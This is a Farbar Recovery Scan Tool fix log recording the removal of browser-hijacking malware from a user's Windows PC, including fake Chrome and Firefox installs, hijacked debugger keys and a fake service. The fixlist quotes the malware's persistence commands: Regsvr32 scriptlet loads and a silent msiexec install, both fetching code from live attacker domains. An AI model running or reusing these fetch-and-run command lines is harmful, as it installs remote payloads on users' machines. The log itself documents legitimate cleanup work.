Fix result of Farbar Recovery Scan Tool (x64) Version: 22-05-2017
Ran by Oli (23-05-2017 16:53:30) Run:1
Running from C:\Users\Oli\Desktop\FRST
Loaded Profiles: Oli (Available Profiles: Oli)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== ATTENTION
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\Oli\AppData\Local\Bagsarah
RemoveDirectory: C:\Users\Oli\AppData\Roaming\Bagsarah
Task: {1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll
Task: {FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== scrobj.dll
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{4BDE3553-DFE9-4C43-BF35-695B79DE0740}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{6EBED432-3F9F-42B1-99AE-71CE5A061BEC}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Oli\AppData\Local\Firefox
RemoveDirectory: C:\Users\Oli\AppData\Roaming\Firefox
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFjzLOTVWOUZXMjHxMYUcNWM8NjH5MWk8NdRXRUQWOF== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
S2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [X]
2017-05-11 19:25 - 2017-05-11 19:25 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-05-11 19:17 - 2017-05-11 19:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-11 19:16 - 2017-05-11 19:16 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-05-11 19:15 - 2017-05-11 19:15 - 00000000 _____ C:\WINDOWS\SysWOW64\00
C:\Users\Oli\Desktop\BigFarm.lnk
C:\Users\Oli\Desktop\big_bang_empire.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk
EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-2083115291-1334581206-888238541-1001_Classes\ChromeHTML => key removed successfully
"C:\Program Files (x86)\Bagsarah" => removed successfully.
"C:\Users\Oli\AppData\Local\Bagsarah" => removed successfully.
"C:\Users\Oli\AppData\Roaming\Bagsarah" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1931568F-04AF-4C2B-ADF1-BD0144CBC2B8} => key removed successfully
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC8FD99D-AA57-480D-9B6C-65A9DDA1F0C1} => key removed successfully
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => key removed successfully
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => moved successfully
C:\Users\Public\Desktop\Google Chrome.lnk => moved successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4BDE3553-DFE9-4C43-BF35-695B79DE0740} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BF4DAAAD-3B1F-47FE-9568-55FE1FF1A158} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6EBED432-3F9F-42B1-99AE-71CE5A061BEC} => value removed successfully
"C:\Program Files (x86)\Firefox" => removed successfully.
"C:\Users\Oli\AppData\Local\Firefox" => removed successfully.
"C:\Users\Oli\AppData\Roaming\Firefox" => removed successfully.
HKU\S-1-5-21-2083115291-1334581206-888238541-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => value removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => key removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => key removed successfully
HKLM\System\CurrentControlSet\Services\OneDirveSrv => key removed successfully
OneDirveSrv => service removed successfully
C:\WINDOWS\SysWOW64\33 => moved successfully
C:\WINDOWS\SysWOW64\3333333 => moved successfully
C:\WINDOWS\SysWOW64\1111 => moved successfully
C:\WINDOWS\SysWOW64\1111111 => moved successfully
"C:\WINDOWS\SysWOW64\1111" => not found.
C:\WINDOWS\SysWOW64\11 => moved successfully
C:\WINDOWS\SysWOW64\00 => moved successfully
C:\Users\Oli\Desktop\BigFarm.lnk => moved successfully
C:\Users\Oli\Desktop\big_bang_empire.lnk => moved successfully
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => moved successfully
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_1750160028_en-us.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_3458257333_en-us.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\set_425821061_en-us.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk => moved successfully
C:\Users\Oli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => moved successfully
C:\Users\Public\Desktop\Mozilla Firefox.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_1377507374_en-US.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2104518279_en-US.lnk => moved successfully
C:\Users\Oli\AppData\Local\Microsoft\Windows\ConnectedSearch\History\txt_2525402577_en-US.lnk => moved successfully

=========== EmptyTemp: ==========
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 28256931 B
Java, Flash, Steam htmlcache => 839 B
Windows/system/drivers => 4691697 B
Edge => 0 B
Chrome => 0 B
Firefox => 385175796 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 23485 B
systemprofile32 => 128 B
LocalService => 25165 B
NetworkService => 36698 B
Oli => 411667181 B
RecycleBin => 33956635 B
EmptyTemp: => 831.8 MB temporary data Removed.

================================
The system needed a reboot.
==== End of Fixlog 16:56:29 ====